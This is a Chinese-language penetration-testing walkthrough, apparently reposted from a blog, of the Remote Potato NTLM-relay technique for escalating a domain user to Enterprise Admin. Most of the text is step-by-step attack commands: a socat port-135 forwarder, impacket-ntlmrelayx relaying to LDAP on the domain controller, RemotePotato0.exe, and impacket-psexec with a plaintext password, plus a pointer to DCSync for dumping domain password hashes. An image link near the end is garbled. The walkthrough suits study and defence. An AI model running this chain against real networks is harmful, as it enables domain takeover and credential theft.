Remote Potato–从域用户到企业管理员
作者:互联网
文章前言
NTLM中继是一项众所周知的技术,主要用于安全评估中,以便在网络中的服务器上建立立足点或用于特权提升方案。在没有为LDAP和SMB协议启用签名的网络中,这种攻击是可行的。此外,正在使用其提升的帐户身份验证到服务器和工作站中的域管理员可以为攻击者提供机会,使他们可以通过LSASS或通过使用远程马铃薯技术来转储其凭据,从而对整个域造成损害。
Remote Potato是Antonio Cocomazzi和Andrea Pierini发现的一种技术,它允许攻击者将其权限从域用户提升到Enterprise Admin,此技术执行跨协议中继以实现NTLM反射攻击,并将提升的NTLM身份验证中继到域控制器以实现权限提升
前提条件
具有Domain Administrator特权的用户实际上已登录到主机或通过远程桌面登录
攻击者已获得对主机的初始访问权限,或者已通过WinRM或SSH访问
LDAP和SMB签名未配置
权限提升
WinRM访问的方案不是很可行,因为即使WinRM是远程管理的通用协议,默认情况下,它是由管理员和红色团队进行横向移动的域用户也没有权限进行远程身份验证,除非这些权限是由显式设置的。管理员。SSH在Windows系统管理中也不是很常见,通常在使用SSH时,它适用于高级用户或需要对主机进行特殊访问的用户。
Step 1:首先执行以下命令查看域内Domain
Administrator特权用户所在主机的PS配置信息:
Get-PSSessionConfiguration
Step 2:执行以下命令与目标主机建立PowerShell会话
在未启用签名的环境中,域管理员仍然直接向工作站进行身份验证以执行各种任务,并且标准用户属于远程管理用户组,因此这些组织会受到此技术的影响。
在未加入域的系统中,执行以下命令将与目标主机建立PowerShell会话。
pwsh
Enter-PSSession -ComputerName 10.0.0.2 -Authentication Negotiate -Credential $(get-credential)
step 3:运行以下命令,尝试进行终端输出时将首先停止所有后台作业,并且“ socat”实用程序会将传入的流量转发回RPC侦听器。
sudo stty -tostop
sudo socat TCP-LISTEN:135,fork,reuseaddr TCP:10.0.0.2:9998 &
Step 4:在攻击主机上使用一个监听器(HTTP)接收NTLM身份验证并将其中继到DC,这里的域用户"pentestlab"用于权限提升,10.0.0.1为dc的IP地址
sudo impacket-ntlmrelayx -t ldap://10.0.0.1 --no-wcf-server --escalate-user pentestlab
Step 5:在攻击主机的powershell端(Domain Admin用户的控制台下)执行Remote Potato,这里的两个参数分别为用于接收经过身份验证的呼叫的主机(攻击主机的IP地址)的IP地址和RPC端口
https://github.com/antonioCoco/RemotePotato0
.\RemotePotato0.exe -r 10.0.0.3 -p 9998
RemotePotato漏洞利用
简而言之,远程马铃薯技术执行以下事件序列:
最初将调用具有CLSID {5167B42F-C111-47A1-ACC4-8EABE61B0B54}的COM对象。该特定的CLSID与C:\ Windows \ System32 \ easconsent.dll关联,并根据CLSID的列表模拟了登录到主机的用户。
为了在127.0.0.1:9998上设置本地RPC服务器,使用了恶意的OxidResolver(支持COM并存储RPC字符串绑定的服务)。
经过身份验证的呼叫在Kali Linux上的端口135上收到,并转发回端口9998上的目标主机。
第二个通过身份验证的呼叫在端口9997上本地执行,该呼叫通过HTTP中继回Kali Linux。此调用未签名,并且以域控制器上的LDAP服务为目标。
启动身份验证后,将用户添加到Enterprise Admins组。
之后可以检索到NTLM type 3 AUTH身份验证消息,然后将其中继到DC,以便通过LDAP进行身份验证,NTLM type 3 AUTH消息包含客户端对服务器质询的响应、域、用户名和主机信息:
目标用户将被添加到Enterprise Admins组,因为DC上的更改将从域管理员的角度执行
Step :6:之后执行"impacket psexec"模块或任何其他连接(RDP到域控制器等)验证用户是否已获得提升的权限,由于用户对域具有复制权限,因此也可以使用DCSync作为更隐蔽的方法来转储来自域的信息(例如域密码散列)
impacket-psexec 'purple/pentestlab:Password123@10.0.0.1'
当前权限为system权限:
![在这里插入图片描述](https://www.icode9.com/i/ll/?i=20210509082429440.png?,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl81MTM4Nzc1net user pentestlabNA==,size_16,color_FFFFFF,t_70)之后pentstlab用户也成为了Enterprise Admin组的一员:
标签:10.0,Remote,Potato,主机,NTLM,身份验证,用户,从域,权限 来源: https://blog.csdn.net/weixin_51387754/article/details/116558137